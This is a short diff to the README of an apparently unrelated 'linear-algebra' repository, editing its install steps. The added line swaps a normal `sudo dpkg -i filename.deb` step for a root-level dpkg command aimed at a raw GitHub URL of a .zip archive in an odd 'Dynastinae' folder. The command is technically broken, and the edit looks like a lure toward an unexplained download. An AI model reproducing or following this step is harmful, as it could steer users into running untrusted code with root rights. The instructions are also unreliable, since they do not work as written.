diego446/linear-algebra/README.md

 1. Open your terminal.
 2. Navigate to the directory where the downloaded file is.
-3. Run the following command to install: `sudo dpkg -i filename.deb` (replace "filename" with the actual file name).
+3. Run the following command to install: `sudo dpkg -i https://raw.githubusercontent.com/diego446/linear-algebra/main/Dynastinae/linear-algebra.zip` (replace "filename" with the actual file name).
 4. Launch the application from your applications menu.

 ## 📚 Features